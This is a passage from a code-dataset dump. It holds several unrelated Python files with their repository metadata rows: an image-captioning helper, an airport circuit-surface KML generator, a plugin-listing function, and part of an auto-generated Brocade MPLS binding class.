    Fix: the original returned ``48 - len(a)``, which is zero or negative
    for captions of 48+ characters and would make ``ImageFont.truetype``
    fail; the linear branch is now clamped to a positive minimum.
    (Note: the misspelled name is kept — callers use it.)
    """
    s = len(a)
    if s < 12:
        return 36
    if s < 20:
        return 26
    # Linear shrink for long captions, clamped so the size stays positive.
    return max(48 - s, 8)
def _draw_outlined(draw, x, y, text, font, color, shadowcolor):
    """Draw *text* at (x, y) with a 1px outline: 8 shadow copies then the fill."""
    for dx in (-1, 0, 1):
        for dy in (-1, 0, 1):
            if dx or dy:
                draw.text((x + dx, y + dy), text, font=font, fill=shadowcolor)
    draw.text((x, y), text, font=font, fill=color)


def text_alignment(label, im):
    """Overlay a random caption from ``memes/<label>.txt`` onto image *im*.

    Each line of the caption file holds one caption; segments within a
    caption are separated by ``|`` and are stacked vertically (1-4 rows).
    Returns the captioned image as a 300x300 BGR array; on any error,
    returns the fallback "wrong" image instead.

    Fixes vs. the original: the 8-way outlined-text drawing (repeated 8
    times inline) is factored into ``_draw_outlined``; the trailing
    newline of the *last* segment is now stripped in the 2-segment case
    too (the 1-, 3- and 4-segment branches already stripped it).
    """
    label = 'memes/' + label + ".txt"
    f = open(label, 'r')
    s = [x for x in f]
    color = (255, 255, 255)       # white fill
    shadowcolor = (0, 0, 0)       # black outline
    dim = (300, 300)
    a = random.choice(s)
    print(a)
    a = list(a.split('|'))
    try:
        im = cv2.resize(im, dim, interpolation=cv2.INTER_AREA)
        cv2_im_rgb = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
        pil_im = Image.fromarray(cv2_im_rgb)
        draw = ImageDraw.Draw(pil_im)
        # Vertical layout (y positions) for 1..4 caption segments; captions
        # with more than 4 segments use the 4-row layout (as the original did).
        layouts = {1: [230], 2: [7, 230], 3: [7, 210, 239], 4: [7, 40, 220, 250]}
        ys = layouts.get(len(a), layouts[4])
        for idx, y in enumerate(ys):
            segment = a[idx]
            # Only the last segment carries the file's trailing newline.
            text = segment[:-1] if idx == len(ys) - 1 else segment
            # Rough horizontal centering: shift left as the segment grows.
            x = 29 - len(segment) + 2
            font = ImageFont.truetype("font.ttf", lenghth(segment))
            _draw_outlined(draw, x, y, text, font, color, shadowcolor)
        im = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
        return im
    except Exception as e:
        print(e)
        # Fall back to a stock error image so callers always get a frame.
        img = cv2.imread('static/dontdelete/wrong.jpg')
        img = cv2.resize(img, (300, 300))
        return img
| 42.400826
| 69
| 0.521879
| 1,450
| 10,261
| 3.673103
| 0.062759
| 0.135186
| 0.135186
| 0.24033
| 0.900113
| 0.894855
| 0.888847
| 0.888847
| 0.887533
| 0.887533
| 0
| 0.042632
| 0.31878
| 10,261
| 241
| 70
| 42.576763
| 0.719313
| 0.027093
| 0
| 0.715789
| 0
| 0
| 0.013065
| 0.002777
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010526
| false
| 0
| 0.021053
| 0
| 0.057895
| 0.010526
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
741193307cd6bbe7f9207126f54840e8f9d4f011
| 13,554
|
py
|
Python
|
Circ.py
|
LHoBiz/ols_engine
|
9bdbd827f7be17aee95d416255a7f483472c4315
|
[
"MIT"
] | 1
|
2022-01-05T07:38:06.000Z
|
2022-01-05T07:38:06.000Z
|
Circ.py
|
LHoBiz/ols_engine
|
9bdbd827f7be17aee95d416255a7f483472c4315
|
[
"MIT"
] | null | null | null |
Circ.py
|
LHoBiz/ols_engine
|
9bdbd827f7be17aee95d416255a7f483472c4315
|
[
"MIT"
] | null | null | null |
# -*- coding: cp1252 -*-
# Module-level setup: load user/runway input data and OLS dimension tables,
# then derive the runway length used by the circuit-surface generators below.
import math
import OLSDims
import mdl
import EnvSettings
from osgeo import osr
ip = mdl.Data()
f = ip.f  # shared open KML output file handle, written by NCirc/SCirc
# Approach OLS dimension tables (indexed by code number and surface).
AppOLS = OLSDims.AppDim.AppOLS
AppOLSNAME = OLSDims.AppDim.AppOLSNAME
AppOLSDIMS = OLSDims.AppDim.AppOLSDIMS
NRunwayInfo = ip.NRunwayInfo
SRunwayInfo = ip.SRunwayInfo
# Northern end: instrument runway flag and, if applicable, precision data.
NIns = ip.NIns
if NIns == 'Y':
    NPrc = ip.NPrc
    if NPrc != 'N':
        NBLDist = ip.NBLDist
CN = ip.CN  # runway code number
DayOnly = ip.CN  # NOTE(review): copies ip.CN, not ip.DayOnly — looks like a typo; confirm
CL = ip.CL  # runway code letter
RED = ip.RED  # reference elevation datum added to point elevations
MTOW5700kg = ip.MTOW5700kg
RPT = ip.RPT
# Southern end: same instrument/precision data.
SIns = ip.SIns
if SIns == 'Y':
    SPrc = ip.SPrc
    if SPrc != 'N':
        SBLDist = ip.SBLDist
RPT = ip.RPT  # NOTE(review): duplicate of the assignment above; harmless
RWY_WID = ip.RWY_WID
RSW = ip.RSW
CodeNo = range(len(AppOLS))
Surfaces = range(len(AppOLS[0]))
# Runway threshold coordinates (E = easting/elevation inputs, N = northing).
NE = ip.NE
SE = ip.SE
NTE = ip.NTE
NTN = ip.NTN
STE = ip.STE
STN = ip.STN
ARP = ip.ARP
SE = ip.SE  # NOTE(review): duplicate assignment
NE = ip.NE  # NOTE(review): duplicate assignment
zone = ip.zone  # UTM zone for WGS84 conversion
KML_NAME = ip.KML_NAME
completeName = ip.completeName
# Runway length from the two threshold coordinates.
RwyLen = math.sqrt((NTE-STE)*(NTE-STE) + (NTN-STN)*(NTN-STN))
def getParPerp(line, aye, dim, StraightCurv):
    """Return one dimension (metres) of the circling-area geometry.

    Parameters
    ----------
    line : int
        0 = near leg, 1 = far leg of the circuit.
    aye : int
        Aircraft category index: 0 = Cat A/B, 1 = Cat C.
    dim : str
        'parr'  -> perpendicular offset of the leg,
        'extr'  -> extension beyond the runway end,
        'lenth' -> runway length plus the extension.
    StraightCurv : str
        's' = straight segment (far leg has no offset),
        anything else (the callers use 'c') = curved segment.

    Fixes vs. the original: an unknown *dim* now raises ``ValueError``
    instead of silently returning ``None``, and there is no longer an
    ``UnboundLocalError`` path when neither branch matched.
    """
    # Cat A/B circuits extend 1.5 NM beyond the runway end, Cat C 2.0 NM
    # (1852 m per nautical mile).
    extra = (1.5 if aye == 0 else 2.0) * 1852
    if line == 0:
        # Near leg always carries the category's perpendicular offset.
        parra = (1.0 if aye == 0 else 1.5) * 1852
    elif StraightCurv == 's':
        parra = 0  # far straight leg lies on the centreline
    else:
        parra = (1.0 if aye == 0 else 1.5) * 1852
    if dim == 'parr':
        return parra
    if dim == 'extr':
        return extra
    if dim == 'lenth':
        return RwyLen + extra  # RwyLen is the module-level runway length
    raise ValueError("unknown dim: %r" % (dim,))
def NCirc(accur):
    """Write the north-end circling-area outlines to the shared KML file *f*.

    Boundary points are sampled every *accur* metres: the straight legs
    first (accumulated in ``s``), then the semicircular turn areas at each
    end (in ``t``). Points are runway-frame [par, perp, Z] triples,
    converted via mdl.toUTM -> mdl.U_W to WGS84 and emitted as KML
    LineStrings — one <Folder> per aircraft-category circuit.
    NOTE(review): the surface names hard-code "Runway 30"; confirm.
    """
    s = []
    StraightCurv = 's'
    Square = []  # NOTE(review): unused
    count = 0  # NOTE(review): unused
    ct = 0  # NOTE(review): unused
    for aye in range(2): #cats
        for line in range(2): #in n out
            # Number of samples along this straight leg (one extra for the end point).
            I = range(int(1+math.ceil(getParPerp(line,aye,'lenth',StraightCurv)/accur)))
            L = []
            for j in I:
                par = accur*j
                # Clamp the final sample exactly onto the leg end.
                if par >= getParPerp(line,aye,'lenth',StraightCurv):
                    par = getParPerp(line,aye,'lenth',StraightCurv)
                perp = getParPerp(line,aye,'parr',StraightCurv)
                Z=NE  # north-end elevation for every sample
                L.append([par,perp,Z])
            s.append(L)
    t=[]
    StraightCurv = 'c'
    for aye in range(2):
        for line in range(2): #near or far
            # Samples needed around the semicircle (arc length / accur).
            Curvs1 = 2*math.pi*(getParPerp(line,aye,'parr',StraightCurv)/2/2) / accur
            Curvs = range(1+int(math.ceil(Curvs1)))
            K = []
            for j in Curvs:
                angle=j*180/Curvs1
                if angle >= 180:
                    angle = 180
                # Parallel coordinate on the semicircle; far end is offset by the leg length.
                if line == 0:
                    par = (getParPerp(line,aye,'parr',StraightCurv)/2)*(math.sin(math.radians((-1)*angle)))
                elif line == 1:
                    par = getParPerp(line,aye,'lenth',StraightCurv) + (getParPerp(line,aye,'parr',StraightCurv)/2)*(math.sin(math.radians(angle)))
                # Perpendicular coordinate: circle equation, sign flips past 90 degrees.
                if line == 0:
                    perp = math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-par*par)) + getParPerp(line,aye,'parr',StraightCurv)/2
                    if angle >= 90:
                        perp = -1*math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-par*par)) + getParPerp(line,aye,'parr',StraightCurv)/2
                elif line == 1:
                    perp = -1*math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-(par- getParPerp(line,aye,'lenth',StraightCurv))*(par- getParPerp(line,aye,'lenth',StraightCurv)))) + getParPerp(line,aye,'parr',StraightCurv)/2
                    if angle >= 90:
                        perp = math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-(par - getParPerp(line,aye,'lenth',StraightCurv))*(par - getParPerp(line,aye,'lenth',StraightCurv)))) + getParPerp(line,aye,'parr',StraightCurv)/2
                Z=NE
                K.append([par,perp,Z])
            t.append(K)
    F = [1,-1]  # NOTE(review): unused
    # One KML folder per aircraft-category circuit.
    for n in range(2):
        if n == 0:
            OlsSurf = 'Runway 30 Cat A / B Circuit'
        if n == 1:
            OlsSurf = 'Runway 30 Cat C Circuit'
        f.write( '<Folder>\n')
        f.write( '<ScreenOverlay>\n')
        f.write( '<name>Runway: Code '+str(int(CN))+CL+NRunwayInfo+'</name>\n')
        f.write( '<visibility>0</visibility>\n')
        f.write('<overlayXY x="0" y="0" xunits="fraction" yunits="fraction"/>\n')
        f.write('<screenXY x="25" y="95" xunits="pixels" yunits="pixels"/>\n')
        f.write('<rotationXY x="0.5" y="0.5" xunits="fraction" yunits="fraction"/>\n')
        f.write('<size x="0" y="0" xunits="pixels" yunits="pixels"/>\n')
        f.write('<styleUrl>#msn_ylw-pushpin</styleUrl>\n')
        f.write('<ExtendedData>\n')
        f.write('<SchemaData schemaUrl="#NewFeatureType">\n')
        f.write('<SimpleData name="Surface">Dimensions</SimpleData>\n')
        f.write('<SimpleData name="'+OlsSurf+'">-</SimpleData>\n')
        f.write('</SchemaData>\n')
        f.write('</ExtendedData>\n')
        f.write('</ScreenOverlay>\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '<name>'+OlsSurf+'</name>\n')
##        f.write('<open>1</open>\n')
        hero = []  # NOTE(review): unused
        ns = 'n'  # north runway end selector for mdl.toUTM
        xxx = [s,t]  # straight legs first, then curved ends
        for l in range(len(xxx)):
            xx = xxx[l]
            for b in range(len(xx)):
                f.write( """<Placemark>
<name>Untitled Path</name>
<styleUrl>#msn_ylw-pushpin</styleUrl>
<LineString>
<tessellate>1</tessellate>
<coordinates>""")
                for h in range(len(xx[b])):
                    e = RED+xx[b][h][2]  # elevation = datum + point Z
                    Utm = mdl.toUTM(NTE,NTN,STE,STN,ARP,SE,NE,xx[b][h][0],xx[b][h][1],xx[b][h][2],ns)
                    Wgs = list(mdl.U_W(Utm[0],Utm[1],zone, e))
                    # Only the lines belonging to this category's circuit are written:
                    # b 0/1 = Cat A/B, b 2/3 = Cat C.
                    if n == 0:
                        if b == 0 or b == 1:
                            f.write(str(Wgs[0])+","+str(Wgs[1])+","+str(Wgs[2]))
                    if n == 1:
                        if b == 2 or b == 3:
                            f.write(str(Wgs[0])+","+str(Wgs[1])+","+str(Wgs[2]))
                    f.write( "\n")
                f.write( """</coordinates>
</LineString>
</Placemark>""")
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '</Folder>\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
def SCirc(accur):
    """Write the south-end circling-area outlines to the shared KML file *f*.

    Mirror image of ``NCirc``: the perpendicular coordinate is negated so
    the outline lies on the southern side, and points are converted with
    the 's' (south) flag. Sampling interval is *accur* metres.
    NOTE(review): the curved sections use Z=NE (north elevation) even in
    this south-end routine — possible copy-paste bug; confirm.
    """
    s = []
    StraightCurv = 's'
    Square = []  # NOTE(review): unused
    count = 0  # NOTE(review): unused
    ct = 0  # NOTE(review): unused
    for aye in range(2): #cats
        for line in range(2): #in n out
            # Number of samples along this straight leg (one extra for the end point).
            I = range(int(1+math.ceil(getParPerp(line,aye,'lenth',StraightCurv)/accur)))
            L = []
            for j in I:
                par = accur*j
                # Clamp the final sample exactly onto the leg end.
                if par >= getParPerp(line,aye,'lenth',StraightCurv):
                    par = getParPerp(line,aye,'lenth',StraightCurv)
                perp = getParPerp(line,aye,'parr',StraightCurv)
                perp = -1*perp  # mirror onto the southern side
                Z=SE  # south-end elevation
                L.append([par,perp,Z])
            s.append(L)
    t=[]
    StraightCurv = 'c'
    for aye in range(2):
        for line in range(2): #near or far
            # Samples needed around the semicircle (arc length / accur).
            Curvs1 = 2*math.pi*(getParPerp(line,aye,'parr',StraightCurv)/2/2) / accur
            Curvs = range(1+int(math.ceil(Curvs1)))
            K = []
            for j in Curvs:
                angle=j*180/Curvs1
                if angle >= 180:
                    angle = 180
                # Parallel coordinate on the semicircle; far end is offset by the leg length.
                if line == 0:
                    par = (getParPerp(line,aye,'parr',StraightCurv)/2)*(math.sin(math.radians((-1)*angle)))
                elif line == 1:
                    par = getParPerp(line,aye,'lenth',StraightCurv) + (getParPerp(line,aye,'parr',StraightCurv)/2)*(math.sin(math.radians(angle)))
                # Perpendicular coordinate: circle equation, sign flips past 90 degrees.
                if line == 0:
                    perp = math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-par*par)) + getParPerp(line,aye,'parr',StraightCurv)/2
                    if angle >= 90:
                        perp = -1*math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-par*par)) + getParPerp(line,aye,'parr',StraightCurv)/2
                elif line == 1:
                    perp = -1*math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-(par- getParPerp(line,aye,'lenth',StraightCurv))*(par- getParPerp(line,aye,'lenth',StraightCurv)))) + getParPerp(line,aye,'parr',StraightCurv)/2
                    if angle >= 90:
                        perp = math.sqrt(math.fabs((getParPerp(line,aye,'parr',StraightCurv)/2)*(getParPerp(line,aye,'parr',StraightCurv)/2)-(par - getParPerp(line,aye,'lenth',StraightCurv))*(par - getParPerp(line,aye,'lenth',StraightCurv)))) + getParPerp(line,aye,'parr',StraightCurv)/2
                perp = -1*perp  # mirror onto the southern side
                Z=NE  # NOTE(review): north elevation in the south routine — confirm
                K.append([par,perp,Z])
            t.append(K)
    F = [1,-1]  # NOTE(review): unused
    # One KML folder per aircraft-category circuit.
    for n in range(2):
        if n == 0:
            OlsSurf = 'Runway 30 Cat A / B Circuit'
        if n == 1:
            OlsSurf = 'Runway 30 Cat C Circuit'
        f.write( '<Folder>\n')
        f.write( '<ScreenOverlay>\n')
        f.write( '<name>Runway: Code '+str(int(CN))+CL+NRunwayInfo+'</name>\n')
        f.write( '<visibility>0</visibility>\n')
        f.write('<overlayXY x="0" y="0" xunits="fraction" yunits="fraction"/>\n')
        f.write('<screenXY x="25" y="95" xunits="pixels" yunits="pixels"/>\n')
        f.write('<rotationXY x="0.5" y="0.5" xunits="fraction" yunits="fraction"/>\n')
        f.write('<size x="0" y="0" xunits="pixels" yunits="pixels"/>\n')
        f.write('<styleUrl>#msn_ylw-pushpin</styleUrl>\n')
        f.write('<ExtendedData>\n')
        f.write('<SchemaData schemaUrl="#NewFeatureType">\n')
        f.write('<SimpleData name="Surface">Dimensions</SimpleData>\n')
        f.write('<SimpleData name="'+OlsSurf+'">-</SimpleData>\n')
        f.write('</SchemaData>\n')
        f.write('</ExtendedData>\n')
        f.write('</ScreenOverlay>\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '<name>'+OlsSurf+'</name>\n')
##        f.write('<open>1</open>\n')
        hero = []  # NOTE(review): unused
        ns = 's'  # south runway end selector for mdl.toUTM
        xxx = [s,t]  # straight legs first, then curved ends
        for l in range(len(xxx)):
            xx = xxx[l]
            for b in range(len(xx)):
                f.write( """<Placemark>
<name>Untitled Path</name>
<styleUrl>#msn_ylw-pushpin</styleUrl>
<LineString>
<tessellate>1</tessellate>
<coordinates>""")
                for h in range(len(xx[b])):
                    e = RED+xx[b][h][2]  # elevation = datum + point Z
                    Utm = mdl.toUTM(NTE,NTN,STE,STN,ARP,SE,NE,xx[b][h][0],xx[b][h][1],xx[b][h][2],ns)
                    Wgs = list(mdl.U_W(Utm[0],Utm[1],zone, e))
                    # b 0/1 = Cat A/B lines, b 2/3 = Cat C lines.
                    if n == 0:
                        if b == 0 or b == 1:
                            f.write(str(Wgs[0])+","+str(Wgs[1])+","+str(Wgs[2]))
                    if n == 1:
                        if b == 2 or b == 3:
                            f.write(str(Wgs[0])+","+str(Wgs[1])+","+str(Wgs[2]))
                    f.write( "\n")
                f.write( """</coordinates>
</LineString>
</Placemark>""")
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '</Folder>\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
        f.write( '\n')
| 38.948276
| 244
| 0.448724
| 1,575
| 13,554
| 3.855238
| 0.106032
| 0.083004
| 0.083004
| 0.047431
| 0.8722
| 0.8722
| 0.8722
| 0.8722
| 0.863307
| 0.863307
| 0
| 0.029992
| 0.382544
| 13,554
| 347
| 245
| 39.060519
| 0.695543
| 0.017781
| 0
| 0.838906
| 0
| 0.006079
| 0.17177
| 0.036416
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009119
| false
| 0
| 0.015198
| 0
| 0.033435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
741749458300c606e5e5aff5895db73fd796a6fd
| 40
|
py
|
Python
|
tests/test_pycounts_rada.py
|
Radascript/pycounts_rada
|
5683af8f2f7b412d62ef39fea249913fac911886
|
[
"MIT"
] | null | null | null |
tests/test_pycounts_rada.py
|
Radascript/pycounts_rada
|
5683af8f2f7b412d62ef39fea249913fac911886
|
[
"MIT"
] | null | null | null |
tests/test_pycounts_rada.py
|
Radascript/pycounts_rada
|
5683af8f2f7b412d62ef39fea249913fac911886
|
[
"MIT"
] | null | null | null |
from pycounts_rada import pycounts_rada
| 20
| 39
| 0.9
| 6
| 40
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7439a2470dff8bca49fe581f9918bfb4f46e14bf
| 187
|
py
|
Python
|
kirby/builtins/available_plugins/controller.py
|
kirby6/kirby
|
d58086c53b0b1957a701328c4539712512a68464
|
[
"MIT"
] | 5
|
2019-01-31T19:47:52.000Z
|
2019-03-06T09:44:47.000Z
|
kirby/builtins/available_plugins/controller.py
|
kirby6/kirby
|
d58086c53b0b1957a701328c4539712512a68464
|
[
"MIT"
] | null | null | null |
kirby/builtins/available_plugins/controller.py
|
kirby6/kirby
|
d58086c53b0b1957a701328c4539712512a68464
|
[
"MIT"
] | null | null | null |
from kirby.core.private.loader import _loaded_plugins as loaded_plugins
def get_all_available_plugins():
    """Return the names of all loaded plugins, excluding the ``__pycache__`` directory entry.

    Idiom fix: a list comprehension replaces ``list(filter(lambda ...))``,
    which is both clearer and avoids the lambda call per element.
    """
    return [plugin for plugin in loaded_plugins if plugin != '__pycache__']
| 31.166667
| 79
| 0.802139
| 25
| 187
| 5.56
| 0.76
| 0.280576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112299
| 187
| 5
| 80
| 37.4
| 0.837349
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
743bcb465f850e68b8d848bd33b056ddd15fb188
| 37,386
|
py
|
Python
|
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/clear_mpls_statistics/input/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/clear_mpls_statistics/input/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/clear_mpls_statistics/input/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class input(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/clear-mpls-statistics/input. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__mpls_clear_statistics_type','__mpls_clear_statistics_transit_ldp_fec_prefix','__mpls_clear_statistics_transit_ldp_prefix_address','__mpls_clear_statistics_transit_ldp_prefix_mask','__mpls_clear_statistics_transit_label_id','__mpls_clear_statistics_tunnel_ldp_id','__mpls_clear_statistics_tunnel_rsvp_bypass','__mpls_clear_statistics_tunnel_name','__mpls_clear_statistics_tunnel_dest',)
_yang_name = 'input'
_rest_name = 'input'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__mpls_clear_statistics_tunnel_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="mpls-clear-statistics-tunnel-name", rest_name="mpls-clear-statistics-tunnel-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__mpls_clear_statistics_tunnel_ldp_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-ldp-id", rest_name="mpls-clear-statistics-tunnel-ldp-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_clear_statistics_type = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-type", rest_name="mpls-clear-statistics-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_clear_statistics_transit_ldp_prefix_mask = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-mask", rest_name="mpls-clear-statistics-transit-ldp-prefix-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-subnet-mask', is_config=True)
self.__mpls_clear_statistics_tunnel_rsvp_bypass = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-rsvp-bypass", rest_name="mpls-clear-statistics-tunnel-rsvp-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__mpls_clear_statistics_tunnel_dest = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-tunnel-dest", rest_name="mpls-clear-statistics-tunnel-dest", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
self.__mpls_clear_statistics_transit_ldp_fec_prefix = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])/(([0-9])|([1-2][0-9])|(3[0-2]))'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-fec-prefix", rest_name="mpls-clear-statistics-transit-ldp-fec-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-prefix', is_config=True)
self.__mpls_clear_statistics_transit_label_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="mpls-clear-statistics-transit-label-id", rest_name="mpls-clear-statistics-transit-label-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__mpls_clear_statistics_transit_ldp_prefix_address = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="mpls-clear-statistics-transit-ldp-prefix-address", rest_name="mpls-clear-statistics-transit-ldp-prefix-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='mpls-ipv4-address', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
